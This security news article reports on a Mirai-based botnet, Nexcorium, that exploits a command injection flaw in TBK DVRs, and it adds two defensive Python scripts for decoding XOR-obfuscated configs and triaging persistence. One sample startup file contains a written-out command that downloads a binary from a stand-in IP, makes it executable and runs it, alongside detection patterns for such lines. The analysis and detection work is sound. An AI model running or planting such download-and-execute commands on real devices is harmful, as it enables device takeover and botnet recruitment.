Attackers Exploit DVR Command Injection Flaw to Deploy Botnet

By Team-CWD, April 20, 2026
A newly identified malware campaign has been observed exploiting a command injection flaw in digital video recorder (DVR) devices to deploy a Mirai-based botnet, according to analysis by FortiGuard Labs.

The activity targets CVE-2024-3721 in TBK DVR systems, enabling attackers to gain access and install a multi-architecture Mirai variant known as Nexcorium.

Fortinet researchers found that the attack begins with crafted requests abusing vulnerable parameters to execute a downloader script. This script retrieves malicious binaries tailored for different Linux environments, including ARM, MIPS and x86-64 systems, then executes them with elevated permissions.

Evidence within the attack traffic includes a custom HTTP header referencing “Nexus Team,” which analysts believe may point to a previously untracked threat actor. Upon execution, the malware announces control of the compromised system, signaling a successful infection.

“The Nexcorium campaign is a precise illustration of why automated scanning alone cannot close the exposure gap,” Trey Ford, chief strategy and trust officer at Bugcrowd, said. “Machine speed analysis tells you a vulnerability exists, but human researcher depth tells you how an adversary will chain it, weaponize it and sustain access long after the initial alert fires.”

Multi-Stage Infection and Persistence Techniques

Once deployed, Nexcorium initializes a configuration set hidden through XOR encoding. This includes command-and-control (C2) server details, attack instructions and a built-in credential list used for brute-force activity.
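Mirai-family samples typically keep this configuration in a table of XOR-obfuscated strings, and an analyst's first job is to recover the key and pull the C2 host and credential list out as indicators. The script below is an added example, not FortiGuard's tooling or the Nexcorium sample: the table layout (length-prefixed entries XORed with a single key byte), the key and every hostname and credential in it are constructed assumptions.

```python
import re
import string

# Constructed sample, not taken from the Nexcorium binary: a Mirai-style
# config table of length-prefixed entries, each XORed with one key byte.
# The key and every value below are made up for this example.
SAMPLE_KEY = 0x37
_PLAIN = [b"c2.example.invalid", b"admin:admin", b"root:changeme", b"root:12345"]

# Bytes a genuine config string (hostname, user:pass) would be drawn from.
ALLOWED = set((string.ascii_letters + string.digits + ".:-_").encode())

def encode_table(entries, key):
    """Build the obfuscated table (used here only to construct the sample)."""
    out = bytearray()
    for e in entries:
        out += bytes([len(e)]) + bytes(b ^ key for b in e)
    return bytes(out)

SAMPLE_TABLE = encode_table(_PLAIN, SAMPLE_KEY)

def parse_table(blob, key):
    """Walk the length-prefixed table; return decoded entries, or None if malformed."""
    entries, i = [], 0
    while i < len(blob):
        n = blob[i]
        chunk = blob[i + 1:i + 1 + n]
        if n == 0 or len(chunk) != n:
            return None          # zero length or a length that runs past the buffer
        entries.append(bytes(b ^ key for b in chunk))
        i += 1 + n
    return entries

def score(entries):
    """Fraction of decoded bytes that fall inside the expected charset."""
    data = b"".join(entries)
    return sum(b in ALLOWED for b in data) / len(data) if data else 0.0

def recover_key(blob):
    """Brute-force the single key byte: the right one yields the cleanest text."""
    return max(range(256), key=lambda k: score(parse_table(blob, k) or []))

def extract_iocs(blob):
    """Decode with the recovered key and split hostnames from user:pass pairs."""
    entries = [e.decode() for e in parse_table(blob, recover_key(blob))]
    creds = [e for e in entries if re.fullmatch(r"[\w.-]+:[\w.-]+", e)]
    hosts = [e for e in entries if re.fullmatch(r"[a-z0-9-]+(\.[a-z0-9-]+)+", e)]
    return {"hosts": hosts, "credentials": creds}
```

On a real dump the table offset and entry framing have to be located first; the charset score then rejects keys that merely flip a bit and keep letters printable.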

The malware closely mirrors traditional Mirai architecture, with modules dedicated to scanning, persistence and attack execution.

The scanner component attempts to propagate by exploiting known weaknesses and leveraging default credentials over Telnet connections. Among its embedded exploits is CVE-2017-17215, a vulnerability affecting Huawei routers, which expands its reach beyond the initial DVR targets.

In practice, the malware combines several techniques to scale infections. It exploits CVE-2024-3721 for initial access, uses default credentials to move laterally, targets multiple CPU architectures and incorporates legacy exploits to broaden its reach across vulnerable devices.

Persistence is achieved through several mechanisms. The malware modifies system initialization files, creates startup scripts and registers system services to ensure execution after reboot. It also schedules recurring tasks via cron jobs, allowing it to survive system restarts and maintain long-term access.
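As an added, defender-side illustration that is not part of the FortiGuard analysis, the following triage script checks a constructed snapshot of a Linux DVR's startup files for the persistence patterns just described: init scripts, rc.local, cron entries and service units that launch binaries from volatile or world-writable directories, chain a download into execution, or run hidden dot-prefixed files. The file contents, the dropper names and the download URL are made up; only the paths are standard locations.

```python
import re

# Constructed snapshot of startup-related files from a Linux-based DVR.
# Paths are standard locations; the contents, dropper names and URL are
# made up for this example.
SNAPSHOT = {
    "/etc/rc.local": "#!/bin/sh\n/tmp/.x86 &\nexit 0\n",
    "/etc/init.d/S99net": "#!/bin/sh\nwget -q http://198.51.100.7/bins/mips -O /tmp/.m && chmod +x /tmp/.m && /tmp/.m\n",
    "/etc/init.d/S40network": "#!/bin/sh\nifup -a\n",
    "/var/spool/cron/crontabs/root": "*/5 * * * * /dev/shm/.x86 >/dev/null 2>&1\n0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n",
    "/etc/systemd/system/update.service": "[Service]\nExecStart=/var/run/.sys\n[Install]\nWantedBy=multi-user.target\n",
}

# Each rule names one persistence trait: executing from a volatile or
# world-writable directory, downloading and running in a single line, and
# launching a hidden (dot-prefixed) binary.
RULES = [
    ("exec-from-volatile-dir", re.compile(r"(^|[\s=&;|])/(tmp|dev/shm|var/run|var/tmp)/\S+")),
    ("download-and-run", re.compile(r"\b(wget|curl|tftp)\b.*(&&|\||;).*(sh|chmod)")),
    ("hidden-binary", re.compile(r"/\.[A-Za-z0-9_]+")),
]

def triage(snapshot):
    """Return (path, line_no, rule, line) for every startup line that hits a rule."""
    findings = []
    for path, content in snapshot.items():
        for no, line in enumerate(content.splitlines(), 1):
            s = line.strip()
            if not s or s.startswith("#"):
                continue          # skip blanks and comments, including shebangs
            for name, rx in RULES:
                if rx.search(s):
                    findings.append((path, no, name, s))
    return findings

def flagged_paths(snapshot):
    """Distinct startup files that produced at least one finding."""
    return sorted({f[0] for f in triage(snapshot)})
```

On a live device the same logic applies to the output of a read-only collection (for example over SSH or a mounted firmware image), and the benign S40network and logrotate entries show why the rules key on where and how a binary is launched rather than on the file being a startup hook at all.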


DDoS Capabilities and Operational Impact

After establishing persistence, Nexcorium connects to a remote command server to receive instructions.

It supports a wide range of distributed denial-of-service (DDoS) methods, including UDP floods, TCP SYN floods and application-layer attacks such as SMTP flooding.

Attack commands are dynamically issued by the C2 infrastructure, enabling coordinated campaigns across infected devices. The malware can also terminate ongoing attacks or remove itself when instructed, suggesting centralized control over botnet operations.

“Enterprises have had their fleets of IoT and OT devices used by Mirai and its variants for some time, particularly for DDoS attacks,” John Gallagher, vice president of Viakoo Labs at IoT security firm Viakoo, said. “Until more action is taken by enterprises to maintain cyber hygiene on IoT devices, this will continue because of the ease of infection and ability to move laterally.”

Security teams should focus on foundational controls for IoT environments, Gallagher said, noting that traditional agent-based tools are often ineffective.

“IoT devices don’t allow agents to be hosted on them, so only agentless discovery and remediation solutions can apply,” he added. “Other best practices for IoT security include automated methods for password and certificate management as well as firmware management.”
